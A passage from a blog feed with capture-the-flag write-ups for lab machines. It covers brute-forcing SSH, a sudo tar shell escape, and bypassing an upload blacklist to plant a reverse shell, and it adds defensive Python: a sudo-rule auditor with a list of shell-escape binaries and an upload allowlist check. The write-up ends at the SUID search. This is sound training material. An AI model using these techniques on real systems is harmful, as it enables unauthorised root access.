<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="768" height="586" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png" alt="Bounty Hacker nmap results" class="wp-image-839" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png?w=768&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/nmap.png?resize=300%2C229&amp;ssl=1 300w" sizes="(max-width: 768px) 100vw, 768px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">Nice! It looks like they left an anonymous account enabled on their FTP server. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="547" height="436" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png" alt="anonymous ftp" class="wp-image-841" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png?w=547&amp;ssl=1 547w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/ftp.png?resize=300%2C239&amp;ssl=1 300w" sizes="(max-width: 547px) 100vw, 547px" /><figcaption class="wp-element-caption">ftp</figcaption></figure>



<p class="wp-block-paragraph">These files look interesting: <code>locks.txt</code> and <code>task.txt</code>. I will just go ahead and download them onto my system and give them a read.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="267" height="452" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png" alt="Bounty Hacker locks.txt" class="wp-image-862" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png?w=267&amp;ssl=1 267w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/07/locks.txt.png?resize=177%2C300&amp;ssl=1 177w" sizes="(max-width: 267px) 100vw, 267px" /><figcaption class="wp-element-caption">locks.txt</figcaption></figure>



<p class="wp-block-paragraph">Score! This file looks like it contains passwords. Not sure which is the right one but let us check out the <code>task.txt</code> for further clues.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="324" height="119" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png" alt="Bounty Hacker task.txt" class="wp-image-842" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png?w=324&amp;ssl=1 324w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/task.txt.png?resize=300%2C110&amp;ssl=1 300w" sizes="(max-width: 324px) 100vw, 324px" /><figcaption class="wp-element-caption">task.txt</figcaption></figure>



<p class="wp-block-paragraph">Now, if you have never seen the show, there is some context to the message. Vicious is the main antagonist in Cowboy Bebop, and Red Eye is an illegal performance-enhancing drug. Lin is one of Vicious&#8217;s henchmen, and I would be willing to bet that he was the one that set up this server.</p>



<p class="wp-block-paragraph">Going back to our Nmap scan, we can see that SSH is running on the machine. Using a tool like <a href="https://www.kali.org/tools/hydra/">Hydra</a>, we can try the passwords found in <code>locks.txt</code> and brute-force our way into Lin&#8217;s account.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="781" height="315" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png" alt="Bounty Hacker hydra results - cracked user password" class="wp-image-843" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?w=781&amp;ssl=1 781w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?resize=300%2C121&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/hydra.png?resize=768%2C310&amp;ssl=1 768w" sizes="(max-width: 781px) 100vw, 781px" /><figcaption class="wp-element-caption">hydra results</figcaption></figure>



<p class="wp-block-paragraph">And just like that, we have Lin&#8217;s login information! </p>



<h2 class="wp-block-heading">Exploitation</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="615" height="328" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png" alt="Bounty Hacker user.txt flag" class="wp-image-844" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png?w=615&amp;ssl=1 615w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/user.txt.png?resize=300%2C160&amp;ssl=1 300w" sizes="(max-width: 615px) 100vw, 615px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">The <code>user.txt</code> flag is found immediately in lin&#8217;s home directory. The last thing we need to do is escalate our privileges and read the <code>root.txt</code> flag.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Running <code>sudo -l</code> lists the commands the user is allowed to invoke with root privileges.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="747" height="148" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png" alt="linux privilege escalation" class="wp-image-845" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png?w=747&amp;ssl=1 747w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/sudo-l.png?resize=300%2C59&amp;ssl=1 300w" sizes="(max-width: 747px) 100vw, 747px" /><figcaption class="wp-element-caption">sudo -l</figcaption></figure>



<p class="wp-block-paragraph">The <code>tar</code> command bundles a group of files into an archive (optionally compressing it). Let&#8217;s check GTFObins to see if there are any commands we can leverage to our advantage.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="818" height="168" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png" alt="GTFObins - sudo command for (root) /bin/tar" class="wp-image-846" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?w=818&amp;ssl=1 818w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?resize=300%2C62&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/gtfobins.png?resize=768%2C158&amp;ssl=1 768w" sizes="(max-width: 818px) 100vw, 818px" /><figcaption class="wp-element-caption">GTFObins</figcaption></figure>



<p class="wp-block-paragraph">There are a couple of things going on in this command. First, tar creates an archive at /dev/null, so nothing is actually written anywhere. Because tar runs under sudo, the checkpoint action that spawns a bash shell at checkpoint 1 also runs as root, which escalates our privileges.</p>
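<p class="wp-block-paragraph">Both this tar rule and the backup.pl/copy.sh chain in the LazyAdmin write-up earlier in this feed are sudo NOPASSWD entries that an administrator can catch in an audit before anyone abuses them. The script below is an added example, not code from either room or from this blog; it assumes sudoers or <code>sudo -l</code> style input, a hand-picked subset of the GTFOBins sudo entries, and a constructed in-memory file system modelled on the two rooms rather than their real files.</p>

```python
"""Audit sudo NOPASSWD rules for the weaknesses seen in these write-ups.

Added example, not code from the rooms or from eric.cc. It reads sudoers or
`sudo -l` style lines and reports: a tool that GTFOBins lists as able to spawn
a shell when sudo pins no arguments (the tar case), and a pinned script, or a
file that script references, which non-root users can overwrite (the
backup.pl -> copy.sh case).
"""
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Hand-picked subset of the sudo entries on GTFOBins; extend it for real use.
SHELL_ESCAPE_BINARIES = {
    "tar", "perl", "python", "python3", "ruby", "vim", "vi", "less", "more",
    "find", "awk", "env", "bash", "sh", "zsh", "nano", "ed",
}
NOPASSWD_RE = re.compile(r"NOPASSWD:\s*(?P<cmds>.+?)\s*$")
ABS_PATH_RE = re.compile(r"(?<![\w.])/[\w./-]+")

# A file lookup returns (mode bits, text or None), or None when the path is absent.
FileLookup = Callable[[str], Optional[Tuple[int, Optional[str]]]]


def disk_lookup(path: str) -> Optional[Tuple[int, Optional[str]]]:
    """Real filesystem backend: mode bits plus contents when readable as text."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return None
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return mode, fh.read()
    except OSError:
        return mode, None


def non_root_writable(mode: int) -> bool:
    """True when the group or other write bit is set on the file."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_nopasswd(lines: List[str], lookup: FileLookup = disk_lookup) -> List[Dict[str, str]]:
    """Return one finding per problem; each has 'command', 'issue' and 'path'."""
    findings: List[Dict[str, str]] = []

    def report(cmd: str, issue: str, path: str = "") -> None:
        findings.append({"command": cmd, "issue": issue, "path": path})

    for raw in lines:
        line = raw.split("#", 1)[0].strip()          # ignore comments
        match = NOPASSWD_RE.search(line)
        if not match:
            continue
        # sudoers allows several commands per rule, separated by commas
        for cmd in (c.strip() for c in match.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                report(cmd, "NOPASSWD on ALL is an unrestricted root shell")
                continue
            tokens = cmd.split()
            binary = os.path.basename(tokens[0])
            if len(tokens) == 1 and binary in SHELL_ESCAPE_BINARIES:
                report(cmd, "unpinned arguments on a GTFOBins shell-escape binary", tokens[0])
            elif len(tokens) == 1:
                report(cmd, "no arguments pinned, caller controls them all", tokens[0])
            # Pinned arguments: check each file for non-root write access and,
            # one level down, any absolute path the script itself mentions.
            for arg in (t for t in tokens[1:] if t.startswith("/")):
                entry = lookup(arg)
                if entry is None:
                    report(cmd, "pinned path does not exist (rule may be stale)", arg)
                    continue
                mode, text = entry
                if non_root_writable(mode):
                    report(cmd, "pinned script is writable by non-root users", arg)
                for ref in sorted(set(ABS_PATH_RE.findall(text or ""))):
                    ref_entry = lookup(ref)
                    if ref_entry is not None and non_root_writable(ref_entry[0]):
                        report(cmd, f"file referenced by {arg} is writable by non-root users", ref)
    return findings


# Constructed sample input modelled on the two rooms (not the real files).
SAMPLE_RULES = [
    "www-data ALL=(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl",  # LazyAdmin-style
    "lin ALL=(root) NOPASSWD: /bin/tar",                                 # Bounty Hacker-style
]
SAMPLE_FS: Dict[str, Tuple[int, Optional[str]]] = {
    "/usr/bin/perl": (0o755, None),
    "/bin/tar": (0o755, None),
    "/home/itguy/backup.pl": (0o550, '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n'),
    "/etc/copy.sh": (0o777, "rm -r /tmp/*\n"),
}


def sample_findings() -> List[Dict[str, str]]:
    """Run the audit against the constructed sample with an in-memory lookup."""
    return audit_nopasswd(SAMPLE_RULES, lookup=SAMPLE_FS.get)


if __name__ == "__main__":
    for f in sample_findings():
        print(f"{f['issue']}: {f['command']} [{f['path']}]")
```

Against the constructed sample it reports the world-writable copy.sh behind the pinned backup.pl and the unpinned tar entry; run it with <code>disk_lookup</code> (the default) over <code>visudo -c</code> checked sudoers lines on a real host.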



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="776" height="133" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png" alt="Bounty Hacker root.txt flag" class="wp-image-848" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?w=776&amp;ssl=1 776w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?resize=300%2C51&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/root.txt.png?resize=768%2C132&amp;ssl=1 768w" sizes="(max-width: 776px) 100vw, 776px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">And there you have it! The <code>root.txt</code> flag file is easy to find in the root directory.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, this TryHackMe room earns its easy badge. Enumeration and privilege escalation were pretty straightforward and a piece of cake for this braggadocious hacker.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions-1024x681.png" alt="Bounty Hacker Task 1 Solutions" class="wp-image-849" style="width:840px;height:558px" width="840" height="558" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=1024%2C681&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=300%2C199&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?resize=768%2C511&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/06/Task-1-Solutions.png?w=1211&amp;ssl=1 1211w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Task 1 Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-bounty-hacker/">TryHackMe: Bounty Hacker</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-bounty-hacker/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">493</post-id>	</item>
		<item>
		<title>TryHackMe: RootMe</title>
		<link>https://eric.cc/tryhackme-rootme/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-rootme</link>
					<comments>https://eric.cc/tryhackme-rootme/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 23 Feb 2022 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=438</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe RootMe is arranged to help newcomers hack this box. Enumerate, bypass restrictions, and abuse SUID perms to escalate to root.</p>
<p>The post <a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-rootme/">TryHackMe: RootMe</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading" id="introduction">Introduction</h2>



<p class="wp-block-paragraph"><a href="https://tryhackme.com/room/rrootme">RootMe</a> is a beginner-level capture-the-flag challenge from TryHackMe. The tasks are arranged to guide newcomers through the process of hacking this machine. It starts with enumerating the system by scanning for open ports and directories. Next, we will bypass the website&#8217;s upload restrictions and gain a reverse shell on the webserver. Finally, we will abuse SUID permissions to escalate our privileges to root.</p>



<h2 class="wp-block-heading" id="information-gathering">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="521" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/1.-Task-2-1024x521.png?resize=1024%2C521" alt="Task 2" class="wp-image-757" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=1024%2C521&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=300%2C153&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?resize=768%2C391&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/1.-Task-2.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 2</figcaption></figure>



<p class="wp-block-paragraph">There is not a lot of information to be gathered during the information-gathering phase. Almost all of the reconnaissance task questions can be answered through Nmap.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="757" height="388" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/2.-nmap-h.png?resize=757%2C388" alt="RootMe Nmap results" class="wp-image-790" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/2.-nmap-h.png?w=757&amp;ssl=1 757w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/2.-nmap-h.png?resize=300%2C154&amp;ssl=1 300w" sizes="(max-width: 757px) 100vw, 757px" /><figcaption>Nmap</figcaption></figure>



<p class="wp-block-paragraph">There are <code>2</code> open ports on this machine. This Ubuntu server is using Apache version <code>2.4.29</code> and is running <code>SSH</code> on port 22.</p>



<p class="wp-block-paragraph">The last thing to check is whether there are any hidden directories on the Apache webserver.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="779" height="400" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=779%2C400" alt="GoBuster results" class="wp-image-791" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?w=779&amp;ssl=1 779w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=300%2C154&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/3.-gobuster-h.png?resize=768%2C394&amp;ssl=1 768w" sizes="(max-width: 779px) 100vw, 779px" /><figcaption>directories</figcaption></figure>



<p class="wp-block-paragraph">Gobuster found a couple of directories, but the ones of importance are <code>/panel</code> and <code>/uploads</code>.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="520" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/5.-Task-2-Solutions-1024x520.png?resize=1024%2C520" alt="RootMe Task 2 Solutions" class="wp-image-762" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=1024%2C520&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=300%2C152&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?resize=768%2C390&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/5.-Task-2-Solutions.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 2 Solutions</figcaption></figure>



<h2 class="wp-block-heading" id="exploitation">Exploitation</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="208" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/6.-Task-3-1024x208.png?resize=1024%2C208" alt="Task 3" class="wp-image-763" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=1024%2C208&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?resize=768%2C156&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/6.-Task-3.png?w=1210&amp;ssl=1 1210w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 3</figcaption></figure>



<p class="wp-block-paragraph">Let&#8217;s check out the <code>/panel/</code> directory. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="669" height="707" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/4.-panel.png?resize=669%2C707" alt="panel directory" class="wp-image-761" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/4.-panel.png?w=669&amp;ssl=1 669w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/4.-panel.png?resize=284%2C300&amp;ssl=1 284w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption>/panel</figcaption></figure>



<p class="wp-block-paragraph">It looks like we can upload any file we want to it. Let&#8217;s try uploading a <a href="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php">PHP reverse shell</a>. <a href="https://www.netsparker.com/blog/web-security/understanding-reverse-shells/">&#8220;A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the attacker’s host.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="669" height="696" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/7.-php-denied.png?resize=669%2C696" alt="failed php upload" class="wp-image-764" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/7.-php-denied.png?w=669&amp;ssl=1 669w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/7.-php-denied.png?resize=288%2C300&amp;ssl=1 288w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption>PHP failed upload</figcaption></figure>



<p class="wp-block-paragraph">It looks like the webserver does not allow PHP files to be uploaded to it. <a href="https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass">&#8220;Developers may blacklist specific file extensions and prevent users from uploading files with extensions that are considered dangerous.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="302" height="111" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/8.-php2php5.png?resize=302%2C111" alt="php to php5 file" class="wp-image-765" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/8.-php2php5.png?w=302&amp;ssl=1 302w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/8.-php2php5.png?resize=300%2C110&amp;ssl=1 300w" sizes="(max-width: 302px) 100vw, 302px" /><figcaption>changing the file to php5</figcaption></figure>



<p class="wp-block-paragraph">We can try to bypass the file upload blacklist by changing the extension of the file. For example, I have changed the file from <code>reverse.php</code> to <code>reverse.php.php5</code>.</p>
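<p class="wp-block-paragraph">To see why an extension blacklist is the wrong control here, the following is an added example in Python (not code from the room or from this post) that places the kind of last-extension blocklist the <code>/panel</code> upload appears to use next to an allowlist check that accepts exactly one extension from a short list and verifies the file&#8217;s leading bytes. The function names, the blocked and allowed extension sets and the magic-byte table are assumptions made for the example; the room&#8217;s real server-side check is not visible.</p>

```python
"""Upload filename validation: the extension blocklist that the /panel upload
appears to use (an illustrative reconstruction, not the room's real code)
next to an allowlist with content sniffing.  Added example for this post."""
import os
import secrets

# Blocklist: only the extensions the developer thought of.  (Assumed set.)
BLOCKED_EXTENSIONS = {"php", "phtml", "phar"}

# Allowlist: the only content an image upload form should ever accept.  (Assumed set.)
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes of each accepted format, so a script renamed to .png is
# still rejected even though its extension looks harmless.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def blocklist_allows(filename: str) -> bool:
    """Weak check: inspect only the final extension.

    'reverse.php.php5' ends in 'php5', which is not in the set, so it passes,
    yet the web server still executed it as PHP in the write-up above.
    """
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in BLOCKED_EXTENSIONS


def allowlist_allows(filename: str, head: bytes) -> bool:
    """Hardened check: exactly one extension, taken from the allowlist, and
    the first bytes of the content must match that format's magic number."""
    base = os.path.basename(filename)       # ignore any directory components
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:     # 'name.ext' only: no 'a.php.png'
        return False
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return head.startswith(MAGIC[ext])


def stored_name(filename: str) -> str:
    """Server-chosen name for an accepted file: a random token plus the
    validated extension, so the uploader never controls the stored path."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(8)}.{ext}"
```

<p class="wp-block-paragraph">The blocklist version accepts <code>reverse.php.php5</code> exactly as the upload form did above, while the allowlist version rejects it for having two extensions before it even looks at the content. Generating the stored name on the server closes the remaining gap, since the uploader no longer chooses what lands under <code>/uploads/</code>.</p>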



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="670" height="694" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/9.-php5-accepted.png?resize=670%2C694" alt="successful php5 file upload" class="wp-image-766" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/9.-php5-accepted.png?w=670&amp;ssl=1 670w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/9.-php5-accepted.png?resize=290%2C300&amp;ssl=1 290w" sizes="(max-width: 670px) 100vw, 670px" /><figcaption>php5 successful upload</figcaption></figure>



<p class="wp-block-paragraph">The file has been successfully uploaded! We can even check out the <code>/uploads/</code> directory to confirm that the file has been uploaded.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="495" height="222" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/10.-uploads.png?resize=495%2C222" alt="uploads directory" class="wp-image-767" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/10.-uploads.png?w=495&amp;ssl=1 495w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/10.-uploads.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 495px) 100vw, 495px" /><figcaption>/uploads directory</figcaption></figure>



<p class="wp-block-paragraph">We can use the <code>netcat</code> tool to listen for incoming connections on port 4444. Requesting the <code>/uploads/reverse.php.php5</code> file in the web browser runs the script on the server, which then connects back to our listener.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="774" height="277" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/13.-user-h.png?resize=774%2C277" alt="RootMe user.txt" class="wp-image-795" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?w=774&amp;ssl=1 774w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?resize=300%2C107&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/13.-user-h.png?resize=768%2C275&amp;ssl=1 768w" sizes="(max-width: 774px) 100vw, 774px" /><figcaption>user.txt</figcaption></figure>



<p class="wp-block-paragraph">We can use the <code>find</code> command to search for files on the system. Since we know the file we are searching for is named <code>user.txt</code>, we can use the <code>-name</code> flag to match it. The <code>2&gt; /dev/null</code> at the end of the command discards error messages (such as permission-denied errors for directories our user cannot read), so only the matching paths are printed.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="209" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/14.-Task-3-Solutions-1024x209.png?resize=1024%2C209" alt="RootMe Task 3 solutions" class="wp-image-771" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=1024%2C209&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?resize=768%2C157&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/14.-Task-3-Solutions.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 3 Solutions</figcaption></figure>



<h2 class="wp-block-heading" id="post-exploitation">Post Exploitation</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="357" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/15.-Task-4-1024x357.png?resize=1024%2C357" alt="Task 4" class="wp-image-772" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=1024%2C357&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=300%2C104&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?resize=768%2C267&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/15.-Task-4.png?w=1209&amp;ssl=1 1209w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption>Task 4</figcaption></figure>



<p class="wp-block-paragraph">Before this challenge, I had no idea what SUID permissions were. <a href="https://www.geeksforgeeks.org/finding-files-with-suid-and-sgid-permissions-in-linux/">&#8220;It is special file permission for executable files. This enables other users to run the file with the effective permissions of the file owner.&#8221;</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="500" height="106" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/01/16.-question-hint.png?resize=500%2C106" alt="" class="wp-image-773" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/16.-question-hint.png?w=500&amp;ssl=1 500w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/01/16.-question-hint.png?resize=300%2C64&amp;ssl=1 300w" sizes="(max-width: 500px) 100vw, 500px" /><figcaption>SUID permission question hint</figcaption></figure>



<p class="wp-block-paragraph">The question hint gives the command <code>find / -user root -perm /4000</code>. This command searches the whole filesystem, starting at <code>/</code>, for files owned by root that have the setuid bit (octal <code>4000</code>) set. Because a setuid file runs with the privileges of its owner rather than those of the user who launches it, a setuid file owned by root is a way to escalate to root. <a href="https://www.liquidweb.com/kb/how-do-i-set-up-setuid-setgid-and-sticky-bits-on-linux/">If a user executes that program it will do so as if they are the user root instead of themselves.</a></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="455" height="595" src="//i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png" alt="" class="wp-image-816" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png?w=455&amp;ssl=1 455w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/02/17.-suid-h.png?resize=229%2C300&amp;ssl=1 229w" sizes="(max-width: 455px) 100vw, 455px" /></figure>



